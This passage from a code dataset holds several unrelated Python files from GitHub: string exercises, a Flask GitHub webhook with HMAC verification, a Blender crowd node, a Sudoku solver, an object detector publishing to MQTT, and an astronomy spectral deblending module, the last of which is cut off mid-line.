len(s):\n# print(s[idx])\n# idx = idx + 2\n\n\n# def removeVowels(s):\n# vowels = \"aeiouAEIOU\"\n# sWithoutVowels = \"\"\n# for eachChar in s:\n# if eachChar not in vowels:\n# sWithoutVowels = sWithoutVowels + eachChar\n# return sWithoutVowels\n#\n#\n# print(removeVowels(\"This sentences has a few vowels, but not all\"))\n# print(removeVowels(\"aAbEefIijOopUus\"))\n#\n\n\n\n# s = \"ball\"\n# r = \"\"\n# for item in s:\n# r = item.upper() +r\n# print(r)\n#\n\n\n# def applyRules(lhch):\n# rhstr = \"\"\n# if lhch == 'A':\n# rhstr = 'B' # Rule 1\n# elif lhch == 'B':\n# rhstr = 'AB' # Rule 2\n# else:\n# rhstr = lhch # no rules apply so keep the character\n#\n# return rhstr\n\n\n# def processString(oldStr):\n# newstr = \"\"\n# for ch in oldStr:\n# newstr = newstr + applyRules(ch)\n#\n# return newstr\n#\n#\n# def createLSystem(numIters,axiom):\n# startString = axiom\n# endString = \"\"\n# for i in range(numIters):\n# endString = processString(startString)\n# startString = endString\n#\n# return endString\n#\n# print(createLSystem(4, \"A\"))\n\n#Looping and counting\n\ndef count(text, aChar):\n lettercount = 0\n for c in text:\n if c == aChar:\n lettercount = lettercount + 1\n return lettercount\n\nprint(count(\"afunnybunny\", \"a\"))\n\n\n# To find the locations of the second or third occurrence of a character in a string,\n# we can modify the find function, adding a third parameter for the starting position in the search string:\n# Save & Run\n\ndef find2(astring, achar, start):\n \"\"\"\n Find and return the index of achar in astring.\n Return -1 if achar does not occur in astring.\n \"\"\"\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1\n\nprint(find2('banana', 'a', 2))\n\n#how to check for every character in ascii\n\nimport string\nprint(string.ascii_lowercase)\nprint(string.ascii_uppercase)\nprint(string.digits)\nprint(string.punctuation)","repo_name":"ahmermalik/classWork","sub_path":"Week1/exerciseselfstudy.py","file_name":"exerciseselfstudy.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71887657363","text":"import collections\nimport hashlib\nimport hmac\n\nimport six\nfrom flask import abort, request\n\n\nclass Webhook(object):\n \"\"\"\n Create a webhook endpoint on a given Flask app\n\n :param app: Flask app running in the project\n :param endpoint: webhook URL endpoint\n :param secret: (optional) Secret used to authenticate Github's request\n \"\"\"\n\n def __init__(self, app, endpoint='/webhooks', secret=None):\n app.add_url_rule(rule=endpoint,\n endpoint=endpoint,\n view_func=self._webhooks_view,\n methods=['POST'])\n\n self._registered_hooks = collections.defaultdict(list)\n if secret is not None and not isinstance(secret, six.binary_type):\n secret = secret.encode('utf-8')\n self._secret = secret\n\n def hook(self, event_type):\n \"\"\"\n Registers a hook function as a class decorator and therefore,\n multiple hooks can be registered\n\n :param event_type: Event name from GitHub event_names list.\n :type event_type: str\n \"\"\"\n\n def decorator(func):\n self._registered_hooks[event_type].append(func)\n return func\n\n return decorator\n\n def _webhooks_view(self):\n \"\"\"\n Main function invoked from Flask once endpoint is reached\n \"\"\"\n\n digest = None\n\n if self._secret:\n digest = hmac.new(self._secret, request.data, hashlib.sha1).hexdigest()\n\n if digest is not None:\n signature_comp = self._get_header('X-Hub-Signature').split('=', 1)\n if not isinstance(digest, six.text_type):\n digest = six.text_type(digest)\n\n if not hmac.compare_digest(signature_comp[1], digest):\n abort(400, 'Invalid signature')\n\n data = request.get_json()\n if data is None:\n abort(400, 'Request body must contain json')\n\n event_type = self._get_header('X-Github-Event')\n\n # Dispatch all hook functions\n for hook in self._registered_hooks.get(event_type, []):\n hook(data)\n\n # Returned a 202 as many hooks could have been triggered\n return 'OK', 202\n\n @staticmethod\n def _get_header(key):\n \"\"\"Get header from a given key\n\n :param key: Key to search for\n \"\"\"\n\n try:\n return request.headers[key]\n except KeyError:\n abort(400, 'Missing header: ' + key)\n","repo_name":"carlosescura/github-bot-python","sub_path":"github_bot/helpers/github_webhook/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25063338672","text":"import bpy\nfrom ..base_node import CrowdManager_BaseNode\n\nclass CrowdManager_CrowdNode(bpy.types.Node, CrowdManager_BaseNode):\n bl_idname = 'CrowdManager_CrowdNode'\n bl_label = 'Crowd'\n\n node_types = [\"crowd\"]\n\n settings : bpy.props.EnumProperty(\n items=[\n (\"obj\", \"Object\", \"\"),\n (\"col\", \"Collection\", \"\")\n ],\n update=CrowdManager_BaseNode.property_changed\n )\n\n def init(self, context):\n super().__init__()\n self.inputs.new('CrowdManager_AgentSocketType', \"Agents\")\n self.inputs.new('CrowdManager_ObjectSocketType', \"Object\")\n self.inputs.new('CrowdManager_CollectionSocketType', \"Collection\")\n self.hide_links()\n \n\n def draw_buttons(self, context, layout):\n layout.prop(self, \"settings\", text=\"\")\n\n def hide_links(self):\n if self.settings == \"obj\":\n self.inputs[1].hide = False\n self.inputs[1].enabled = True\n self.inputs[2].hide = True\n self.inputs[2].enabled = False\n elif self.settings == \"col\":\n self.inputs[1].hide = True\n self.inputs[1].enabled = False\n self.inputs[2].hide = False\n self.inputs[2].enabled = True\n \n def edit(self):\n self.hide_links()\n crowd_collection = getCrowdCollection()\n node0 = self.get_input_node(0)\n node1 = self.get_input_node(1)\n node2 = self.get_input_node(2)\n\n if len(crowd_collection.objects) > 0:\n for obj in crowd_collection.objects:\n bpy.data.objects.remove(obj, do_unlink=True)\n\n if node0 is not None:\n ob = []\n agents = node0.outputs[0].agents\n\n if self.settings == \"obj\":\n if node1 is not None and node1.outputs[0].object is not None: \n ob = [node1.outputs[0].object]\n elif self.settings == \"col\":\n if node2 is not None and node2.outputs[0].collection is not None:\n for obj in node2.outputs[0].collection.objects:\n ob.append(obj)\n\n if (self.settings == \"obj\" and node1 is not None) or (self.settings == \"col\" and node2 is not None):\n if len(agents) > 0 and len(ob) > 0:\n obidx = 0\n for idx, agent in enumerate(agents):\n cur_ob = ob[obidx]\n link = bpy.data.objects.get(f\"AGENT_{idx}\" + \"_\" + cur_ob.name)\n if link is None:\n link = bpy.data.objects.new(f\"AGENT_{idx}\" + \"_\" + cur_ob.name, cur_ob.data)\n \n addInstanceToCollection(link, crowd_collection, idx)\n\n if agent.simulated:\n for i, s in enumerate(agent.sim):\n link.location = s.location\n link.rotation_euler = s.rotation\n link.keyframe_insert(data_path=\"location\", frame = i + agent.sim_start)\n link.keyframe_insert(data_path=\"rotation_euler\", frame = i + agent.sim_start)\n else:\n link.location = agent.sim[0].location\n link.rotation_euler = agent.sim[0].rotation\n \n obidx += 1\n\n if obidx >= len(ob):\n obidx = 0\n else:\n if len(crowd_collection.objects) > 0:\n for a in crowd_collection.objects:\n bpy.data.objects.remove(a, do_unlink=True) \n\n self.linked_update(); \n \ndef addInstanceToCollection(instance, col, idx):\n if len(col.objects) > 0:\n for a in col.objects:\n if f\"AGENT_{idx}\" in a.name:\n bpy.data.objects.remove(a, do_unlink=True)\n break\n\n col.objects.link(instance)\n\ndef getCrowdCollection():\n collection = bpy.data.collections.get(\"GRP_CrowdCollection\")\n\n if collection is None:\n collection = bpy.data.collections.new(\"GRP_CrowdCollection\")\n bpy.context.scene.collection.children.link(collection)\n \n return collection","repo_name":"Christopher-Hosken/crowd_manager","sub_path":"nodes/crowd/crowd_node.py","file_name":"crowd_node.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"707096732","text":"import copy\n\nclass Sudoku:\n def __init__(self, meno_suboru):\n self.tab = []\n with open(meno_suboru, 'r') as fp:\n for riadok in fp:\n r = []\n for j in riadok.strip():\n if j != ' ':\n try:\n j = int(j)\n except ValueError:\n pass\n r.append(j)\n self.tab.append(r)\n print(\"SUDOKU TASK:\")\n print(self.__str__())\n\n def __str__(self):\n vysl = ''\n for r in self.tab:\n for j in r:\n vysl += str(j) + ' '\n vysl += '\\n'\n return vysl\n\n def urob(self):\n item_len_0, item_len_1 = 0, 0\n tab1 = copy.deepcopy(self.tab)\n for row_number in range(0,9):\n row = self.get_row(row_number)\n for column_number in range(0,9):\n if self.tab[row_number][column_number] == '.':\n column = self.get_column(column_number)\n box = self.get_box(column_number, row_number)\n possbilities = set(range(1, 10)) \n poss = possbilities - row - column - box\n if len(poss) == 1:\n tab1[row_number][column_number] = poss\n if len(poss) == 1:\n item_len_1 += 1\n elif len(poss) == 0:\n item_len_0 += 1\n\n self.tab = tab1\n if item_len_0 > 0:\n return -1\n return item_len_1\n\n\n def get_column(self, column_number):\n return {i[column_number] for i in self.tab if i[column_number] != '.'}\n\n def get_row(self, row_number):\n return {i for i in self.tab[row_number] if i != '.'}\n\n def get_box(self, column_number, row_number):\n start_row = row_number//3 * 3\n start_column = column_number//3 * 3\n box = []\n for i in range(start_row, start_row+3):\n box.extend(self.tab[i][start_column:start_column+3])\n return set(box)\n\n def nahrad(self):\n for row in range(9):\n for column in range(9):\n if isinstance(self.tab[row][column], set) and len(self.tab[row][column]) == 1:\n self.tab[row][column] = int(str(self.tab[row][column]).strip('{}'))\n elif isinstance(self.tab[row][column], set):\n self.tab[row][column] = '.' \n\n\n def ries(self):\n condition = True\n while condition:\n sud = self.urob()\n self.nahrad()\n if self.pocet_nezaplnenych() == 0:\n print(\"SUDOKU solution:\")\n print(self.__str__())\n condition = False\n #exit()\n \n if sud == -1 or sud == 0:\n print(\"SUDOKU doesn't have solution\")\n print(self.__str__())\n condition = False\n #exit()\n \n \n\n def pocet_nezaplnenych(self):\n not_filled = 0\n for i in self.tab:\n not_filled += i.count('.')\n return not_filled\n\ns1 = Sudoku('sudoku.txt')\ns1.ries()\n\ns2 = Sudoku('sudoku1.txt')\ns2.ries()","repo_name":"zorell11/python","sub_path":"Sudoku/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18685553028","text":"# import the necessary packages\nfrom edgetpu.detection.engine import DetectionEngine\nfrom imutils.video import VideoStream\nfrom PIL import Image\nimport argparse\nimport imutils\nimport time\nimport cv2\n\nimport paho.mqtt.publish as publish\n\nMQTT_SERVER = \"localhost\"\nMQTT_PATH = \"test_channel\"\n \n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--model\", required=True,\n help=\"path to TensorFlow Lite object detection model\")\nap.add_argument(\"-l\", \"--labels\", required=True,\n help=\"path to labels file\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.3,\n help=\"minimum probability to filter weak detections\")\nargs = vars(ap.parse_args())\n\n# initialize the labels dictionary\nprint(\"[INFO] parsing class labels...\")\nlabels = {}\n \n# loop over the class labels file\nfor row in open(args[\"labels\"]):\n # unpack the row and update the labels dictionary\n (classID, label) = row.strip().split(maxsplit=1)\n labels[int(classID)] = label.strip()\n \n# load the Google Coral object detection model\nprint(\"[INFO] loading Coral model...\")\nmodel = DetectionEngine(args[\"model\"])\n \n# initialize the video stream and allow the camera sensor to warmup\nprint(\"[INFO] starting video stream...\")\nvs = VideoStream(src=0).start()\n#vs = VideoStream(usePiCamera=False).start()\ntime.sleep(2.0)\n\n# loop over the frames from the video stream\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 500 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=500)\n orig = frame.copy()\n \n # prepare the frame for object detection by converting (1) it\n # from BGR to RGB channel ordering and then (2) from a NumPy\n # array to PIL image format\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n \n # make predictions on the input frame\n start = time.time()\n results = model.DetectWithImage(frame, threshold=args[\"confidence\"],\n keep_aspect_ratio=True, relative_coord=False)\n end = time.time()\n # loop over the results\n for r in results:\n # extract the bounding box and box and predicted class label\n box = r.bounding_box.flatten().astype(\"int\")\n (startX, startY, endX, endY) = box\n label = labels[r.label_id]\n publish.single(MQTT_PATH, str(startX), hostname=MQTT_SERVER)\n\n # draw the bounding box and label on the image\n cv2.rectangle(orig, (startX, startY), (endX, endY),\n (0, 255, 0), 2)\n y = startY - 15 if startY - 15 > 15 else startY + 15\n text = \"{}: {:.2f}%\".format(label, r.score * 100)\n cv2.putText(orig, text, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n \n # show the output frame and wait for a key press\n cv2.imshow(\"Frame\", orig)\n key = cv2.waitKey(1) & 0xFF\n \n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n \n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()\n\n\n","repo_name":"SaralTayal123/Object-Finding-Rover","sub_path":"raspberry_pi_packet_serial/obj2.py","file_name":"obj2.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"3"} +{"seq_id":"17283075798","text":"from corextopic import corextopic as ct\nimport pickle\n\n\nclass CorexModel:\n def __init__(self, config, preprocessor, load=False, seed=True):\n self.model_path = config.paths.save_model_path\n if load:\n self.model = pickle.load(open(self.model_path, \"rb\"))\n else:\n self.model = ct.Corex(n_hidden=config.model.num_topics,\n seed=config.model.random_state)\n\n self.vocab = preprocessor.vocab\n self.seed_topics = None\n if seed:\n self.seed_topics = preprocessor.seed_topics\n\n def save(self):\n with open(self.model_path, 'wb') as output:\n pickle.dump(self.model, output, pickle.HIGHEST_PROTOCOL)\n","repo_name":"junronglau/product-defects-mining","sub_path":"models/corex_model.py","file_name":"corex_model.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20323832890","text":"import logging\nimport math\nimport os\nimport time\nimport torch.nn as nn\nimport argparse\nfrom tqdm import tqdm\nimport shutil\nimport pdb\nimport torch\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\nimport utils\nfrom utils import setup_logger\nfrom model import build_model\nfrom trainer import Trainer\nfrom dataset import make_dataloader\nfrom optim import make_optimizer, make_scheduler\n\nfrom utils import AverageMeter\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config_file', type=str,\n default='configs/config.json',\n help='the path to the training config')\n parser.add_argument('-t', '--test', action='store_true',\n default=False, help='Model test')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n if args.test:\n test(args)\n else:\n train(args)\n\n\ndef train(args):\n cfg = utils.process_cfg(args.config_file)\n output_dir = os.path.join(cfg.exp_base, cfg.exp_name, str(time.time()))\n cfg.output_dir = output_dir\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n shutil.copy(args.config_file, cfg.output_dir)\n setup_logger(output_dir)\n logger = logging.getLogger()\n logger.info('Train with config:\\n{}'.format(cfg))\n\n train_dl = make_dataloader(cfg, 'train')\n val_dl = make_dataloader(cfg, 'validation')\n\n model = build_model(cfg)\n logger.info(\"model architecture:\")\n logger.info(model)\n\n optimizer = make_optimizer(cfg, model)\n\n scheduler = make_scheduler(cfg, optimizer)\n\n loss_func = nn.CrossEntropyLoss()\n\n trainer = Trainer(cfg, model, train_dl, val_dl, optimizer, scheduler, loss_func)\n\n trainer.train()\n\n\ndef test(args):\n cfg = utils.process_cfg(args.config_file)\n test_dl = make_dataloader(cfg, 'test')\n model = build_model(cfg)\n model.load_state_dict(torch.load(cfg.test.model_path))\n model = model.to(cfg.device)\n loss_func = nn.CrossEntropyLoss()\n device = cfg.device\n model.eval()\n loss_avg = AverageMeter()\n stats = torch.zeros((2, 2)) # [[tp, fp], [fn, tn]]\n fp_paths, fn_paths = [], []\n for data, label, paths in tqdm(test_dl):\n data, label = data.to(device), label.to(device)\n probs = model(data)\n loss = loss_func(probs, label)\n preds = torch.argmax(probs, dim=1)\n preds = preds.detach().cpu()\n label = label.detach().cpu()\n confuse_matrix = \\\n torch.matmul(torch.stack([preds, 1 - preds], dim=0), torch.stack([label, 1 - label], dim=1))\n stats += confuse_matrix\n fp_indices = torch.nonzero(torch.logical_and(1 - label, preds), as_tuple=True)[0]\n fp_paths.extend([paths[i] for i in fp_indices])\n fn_indices = torch.nonzero(torch.logical_and(1 - preds, label), as_tuple=True)[0]\n fn_paths.extend([paths[i] for i in fn_indices])\n loss_avg.update(loss.detach().cpu().item(), len(data))\n loss = loss_avg.avg\n print('loss:\\n {}'.format(loss))\n acc = (stats[0, 0] + stats[1, 1]) / torch.sum(stats)\n print(\"acc:\\n {}\".format(acc))\n print(\"[[tp, fp], [fn, tn]]:\\n {}\".format(stats))\n\n fp_pic_num = min(len(fp_paths), 10)\n fn_pic_num = min(len(fn_paths), 10)\n fig = plt.figure()\n for i in range(fp_pic_num):\n plt.subplot(4, 5, i+1)\n plt.imshow(imread(fp_paths[i]))\n for i in range(fn_pic_num):\n plt.subplot(4, 5, i+11)\n plt.imshow(imread(fn_paths[i]))\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"CeeZh/wear-mask-correctly-or-not","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39173273592","text":"\"\"\"\n * Universidad del Valle de Guatemala\n * (CC3039) Modelación y Simulación\n * Proyecto Final - Predicción de Resultados de Fútbol\n * \n * Miembros del equipo de trabajo:\n * - Pedro Pablo Arriola Jiménez (20188)\n * - Marco Pablo Orozco Saravia (20857)\n * - Santiago Taracena Puga (20017)\n\"\"\"\n\nclass Team(object):\n def __init__(self, team_data):\n self.name = team_data[\"name\"]\n self.goals_per_game = team_data[\"goals_per_game\"]\n self.shots_on_target = team_data[\"shots_on_target\"]\n self.shots_on_target_accuracy = team_data[\"shots_on_target_accuracy\"]\n self.penalties = team_data[\"penalties\"]\n self.penalty_accuracy = team_data[\"penalty_accuracy\"]\n self.corners = team_data[\"corners\"]\n self.fouls_received_per_game = team_data[\"fouls_received_per_game\"]\n self.offsides_per_game = team_data[\"offsides_per_game\"]\n self.goals_per_game_received = team_data[\"goals_per_game_received\"]\n self.shots_on_target_received = team_data[\"shots_on_target_received\"]\n self.fouls_committed_per_game = team_data[\"fouls_committed_per_game\"]\n self.recoveries_per_game = team_data[\"recoveries_per_game\"]\n self.cut_passes_per_game = team_data[\"cut_passes_per_game\"]\n self.entries_per_game = team_data[\"entries_per_game\"]\n self.clears_per_game = team_data[\"clears_per_game\"]\n self.cards_per_game = team_data[\"cards_per_game\"]\n self.yellow_cards_per_card = team_data[\"yellow_cards_per_card\"]\n self.red_cards_per_card = team_data[\"red_cards_per_card\"]\n","repo_name":"SantiagoTaracena01/liga-results","sub_path":"src/utils/classes/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34572198067","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: raphael.bacher@gipsa-lab.fr\n\"\"\"\n\nimport logging\n\nimport numpy as np\nimport scipy.signal as ssl\nimport yaml\nfrom scipy.ndimage import median_filter\n\nimport astropy.units as units\nfrom astropy.table import Table\nfrom mpdaf.obj import Cube, Image, Spectrum\nfrom mpdaf.sdetect import Source\n\nfrom .parameters import Params\nfrom .regularization import regulDeblendFunc\nfrom .utils import (\n convertIntensityMap,\n extractHST,\n generatePSF_HST,\n getBlurKernel,\n getMainSupport,\n load_filter,\n)\nfrom .version import version as __version__\n\n__all__ = ('Deblending', 'deblendGroup')\n\n\ndef deblendGroup(group, outfile, conf, imLabel, timestamp):\n \"\"\"Deblend a given group.\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('group %d, start, %d sources', group.ID, group.nbSources)\n debl = Deblending(group, conf, imLabel)\n logger.debug('group %d, createIntensityMap', group.ID)\n debl.createIntensityMap()\n logger.debug('group %d, findSources', group.ID)\n debl.findSources()\n logger.debug('group %d, write', group.ID)\n debl.write(outfile, conf, timestamp)\n logger.debug('group %d, done', group.ID)\n\n\nclass Deblending:\n \"\"\"\n Main class for deblending process\n\n Parameters\n ----------\n cube : mpdaf Cube\n The Cube object to be deblended\n nbands : int\n The number of MUSE spectral bins to consider for computation.\n MUSE FSF is assumed constant within a bin.\n conf : dict\n The settings dict.\n\n Attributes\n ----------\n estimatedCube : numpy.ndarray\n Estimated cube\n estimatedCubeCont : numpy.ndarray\n Estimated cube continuum\n residuals : numpy.ndarray\n The cube of residuals (datacube - estimated cube)\n sources: list\n list of estimated spectra\n varSources: list\n list of variances of estimated spectra\n listIntensityMap (HR, LRConvol) : list\n list of Abundance Map of each object detected, at high resolution,\n and after convolution and subsampling\n\n \"\"\"\n\n def __init__(self, group, conf, imLabel):\n self.params = Params(**conf.get('params', {}))\n self.group = group\n\n cube = Cube(conf['cube'])\n self.cube = cube = cube[:, group.region.sy, group.region.sx]\n im = cube[0]\n self.imLabel = Image(data=imLabel[group.region.sy, group.region.sx],\n wcs=im.wcs.copy(), copy=False)\n\n self.segmap = (extractHST(Image(conf['segmap']), im, integer_mode=True)\n .data.filled(0))\n\n # List of all HST ids in the segmap\n listHST_ID = np.unique(self.segmap)\n listHST_ID = listHST_ID[listHST_ID > 0]\n self.listHST_ID = ['bg'] + list(listHST_ID)\n self.nbSources = len(self.listHST_ID) # include background\n\n # spatial shapes\n self.nlbda = cube.shape[0]\n self.shapeLR = cube.shape[1:]\n\n # load the HR images and filters\n self.listImagesHR = []\n filtResp = []\n lbda = cube.wave.coord()\n for band, d in conf['hr_bands'].items():\n imhr = extractHST(Image(d['file']), im)\n # store the flux conversion factor in the header\n imhr.primary_header['photflam'] = d.get('photflam', 1)\n self.listImagesHR.append(imhr)\n\n if 'filter' in d:\n filt = load_filter(d['filter'], lbda)\n else:\n filt = np.ones(self.nlbda)\n filtResp.append(filt)\n self.filtResp = np.array(filtResp)\n\n self.nBands = self.params.nBands\n # compute bands limit indices\n idx = np.linspace(0, self.nlbda, self.nBands + 1, dtype=int)\n self.idxBands = np.array([idx[:-1], idx[1:]]).T\n\n # compute FWHM at the center of bands\n bands_center = self.cube.wave.coord(self.idxBands.mean(axis=1))\n self.listFWHM = (self.params.fsf_a_muse +\n self.params.fsf_b_muse * bands_center)\n\n self.PSF_HST = generatePSF_HST(self.params.alpha_hst,\n self.params.beta_hst)\n\n # for each HST band list all MUSE bands inside it\n self.listBands = self._getListBands(self.nBands, self.filtResp)\n\n def _getListBands(self, nBands, filtResp):\n \"\"\"For each HST band, get the list of all MUSE bands inside it (if one\n of the band limits has filter values > 0).\n \"\"\"\n listBands = []\n nl = filtResp.shape[1]\n lind = list(np.linspace(0, nl - 1, nBands + 1, dtype=int))\n for filt in filtResp:\n mask = filt[lind] > 0\n # check if band limits have non-zero values\n bands_idx = np.where(mask[:-1] | mask[1:])\n listBands.append(list(bands_idx[0]))\n return listBands\n\n def createIntensityMap(self):\n \"\"\"Create intensity maps from HST images and segmentation map.\n To be called before calling findSources().\n \"\"\"\n # for each HST filter, create the high resolution intensity matrix\n # (nbSources x Nb pixels)\n self.listIntensityMapHR = [] # [bands, array(sources, im.shape)]\n\n for im in self.listImagesHR:\n # clip image data to avoid negative abundances\n data = np.maximum(im.data, 10**(-9))\n\n intensityMapHR = np.zeros((self.nbSources, np.prod(data.shape)))\n # put intensityMap of background in first position (estimated\n # spectrum of background will also be first)\n intensityMapHR[0] = 1\n\n for k, hst_id in enumerate(self.listHST_ID[1:], start=1):\n mask = self.segmap == hst_id\n arr = np.where(mask, data, 0)\n intensityMapHR[k] = arr.ravel()\n\n self.listIntensityMapHR.append(intensityMapHR)\n\n def findSources(self, store=False):\n \"\"\"Main function to estimate sources spectra.\n\n Parameters\n ----------\n store : bool\n store intermediate results\n \"\"\"\n regul = self.params.regul\n filt_w = self.params.filt_w\n cubeLR = self.cube.data.filled(np.ma.median(self.cube.data))\n cubeLRVar = self.cube.var.filled(np.ma.median(self.cube.var))\n\n if regul:\n # precompute continuum\n cubeLR_c = median_filter(cubeLR, size=(filt_w, 1, 1),\n mode='reflect')\n\n # compute HST-MUSE transfer functions for all MUSE FSF fwhm considered\n self.listTransferKernel = self._generateHSTMUSE_transfer_PSF()\n\n shapeLR = (self.nbSources, self.nlbda)\n\n # Lists of [HR band, Spectral band]\n nbImagesHR = len(self.listImagesHR)\n\n def _create_result_list():\n return [[None] * self.nBands for _ in range(nbImagesHR)]\n\n tmp_sources = []\n tmp_var = []\n self.listIntensityMapLRConvol = _create_result_list()\n self.listAlphas = _create_result_list()\n self.listRSS = _create_result_list()\n self.listCorrFlux = _create_result_list()\n\n if store:\n self.listMask = _create_result_list()\n self.listccoeff = _create_result_list()\n self.listlcoeff = _create_result_list()\n self.listY = _create_result_list()\n self.listYc = _create_result_list()\n self.listYl = _create_result_list()\n self.spatialMask = _create_result_list()\n\n # If there are several HR images the process is applied on each image\n # and then the estimated spectra are combined using a mean weighted by\n # the response filters\n for j in range(nbImagesHR):\n tmp_sources.append(np.zeros(shapeLR))\n tmp_var.append(np.zeros(shapeLR))\n\n for i, (imin, imax) in enumerate(self.idxBands):\n\n # Do the estimation only if MUSE band is in HST band\n if i in self.listBands[j]:\n # Create intensity maps at MUSE resolution\n intensityMapLRConvol = convertIntensityMap(\n self.listIntensityMapHR[j],\n self.cube[0],\n self.listImagesHR[j],\n self.listFWHM[i],\n self.params.fsf_beta_muse,\n self.listTransferKernel[i]\n )\n\n # truncate intensity map support after convolution using\n # alpha_cut\n supp = getMainSupport(\n intensityMapLRConvol[1:], alpha=self.params.alpha_cut)\n intensityMapLRConvol[1:][~supp] = 0\n\n # put ones everywhere for background intensity map\n intensityMapLRConvol[0] = 1.\n\n # U : n x k (n number of pixels, k number of objects,\n # lmbda number of wavelengths)\n # Y : n x lmbda\n # Yvar : n x lmbda\n\n delta = imax - imin\n U = intensityMapLRConvol.T\n Y = cubeLR[imin:imax].reshape(delta, -1).T\n if regul:\n Y_c = cubeLR_c[imin:imax].reshape(delta, -1).T\n Yvar = cubeLRVar[imin:imax].reshape(delta, -1).T\n\n # normalize intensity maps in flux to get flux-calibrated\n # estimated spectra\n U /= np.sum(U, axis=0)\n\n if regul: # apply regularization\n\n # remove background from intensity matrix as\n # intercept is used instead\n U_ = U[:, 1:]\n\n # generate support: U.shape = (image size, nsources)\n support = np.zeros(U.shape[0], dtype=bool)\n for u in range(U_.shape[1]):\n support[U_[:, u] > 0.1 * np.max(U_[:, u])] = True\n\n # Y_sig2 = np.var(Y[~support, :], axis=0)\n Y_sig2 = np.mean(Yvar, axis=0)\n\n res = regulDeblendFunc(U_, Y, Y_c=Y_c, support=support,\n Y_sig2=Y_sig2, filt_w=filt_w)\n # res -> (res, intercepts, listMask, c_coeff, l_coeff,\n # Y, Y_l, Y_c, c_alphas, listRSS, listA)\n\n # get spectra estimation\n tmp_sources[j][1:, imin:imax] = res[0]\n # for background spectrum get intercept (multiply by\n # number of pixels to get tot flux)\n tmp_sources[j][0, imin:imax] = res[1] * U.shape[0]\n\n # store all elements for checking purposes\n self.listAlphas[j][i] = res[8]\n self.listRSS[j][i] = res[9]\n self.listCorrFlux[j][i] = res[10]\n if store:\n self.spatialMask[j][i] = support\n self.listMask[j][i] = res[2]\n self.listccoeff[j][i] = res[3]\n self.listlcoeff[j][i] = res[4]\n self.listY[j][i] = res[5]\n self.listYl[j][i] = res[6]\n self.listYc[j][i] = res[7]\n\n else: # use classical least squares solution\n tmp_sources[j][:, imin:imax] = np.linalg.lstsq(U, Y)[0]\n\n # get spectra variance : as spectra is obtained by\n # (U^T.U)^(-1).U^T.Y\n # variance of estimated spectra is obtained by\n # (U^T.U)^(-1).Yvar\n Uinv = np.linalg.pinv(U)\n tmp_var[j][:, imin:imax] = np.dot(Uinv**2, Yvar)\n\n self.listIntensityMapLRConvol[j][i] = intensityMapLRConvol\n else:\n self.listIntensityMapLRConvol[j][i] = np.zeros(\n (self.nbSources, self.shapeLR[0] * self.shapeLR[1]))\n\n self._combineSpectra(tmp_sources, tmp_var)\n self._rebuildCube(tmp_sources)\n self._getContinuumCube(tmp_sources)\n self._getResiduals()\n\n def _generateHSTMUSE_transfer_PSF(self):\n \"\"\"Generate HST to MUSE transfer PSF, for each spectral band.\"\"\"\n hst = self.listImagesHR[0]\n dy, dx = hst.get_step(unit=units.arcsec)\n\n # get odd shape\n shape_1 = np.array(hst.shape) // 2 * 2 + 1\n center = shape_1 // 2\n\n # Build \"distances to center\" matrix.\n ind = np.indices(shape_1)\n rsq = ((ind[0] - center[0]) * dx)**2 + (((ind[1] - center[1])) * dy)**2\n\n # Build HST FSF\n asq_hst = self.params.fwhm_hst**2 / 4.0 / \\\n (2.0**(1.0 / self.params.beta_hst) - 1.0)\n psf_hst = 1.0 / (1.0 + rsq / asq_hst)**self.params.beta_hst\n psf_hst /= psf_hst.sum()\n # FIXME: use Moffat(rsq, asq_hst, self.params.beta_hst) ?\n\n listTransferKernel = []\n for fwhm in self.listFWHM:\n # Build MUSE FSF\n asq = fwhm ** 2 / 4.0 / (\n 2.0 ** (1.0 / self.params.fsf_beta_muse) - 1.0)\n im_muse = 1.0 / (1.0 + rsq / asq) ** self.params.fsf_beta_muse\n im_muse /= im_muse.sum()\n listTransferKernel.append(getBlurKernel(\n imHR=psf_hst, imLR=im_muse, sizeKer=(21, 21)))\n return listTransferKernel\n\n def _combineSpectra(self, tmp_sources, tmp_var):\n \"\"\"Combine spectra estimated on each HST image.\"\"\"\n weigthTot = 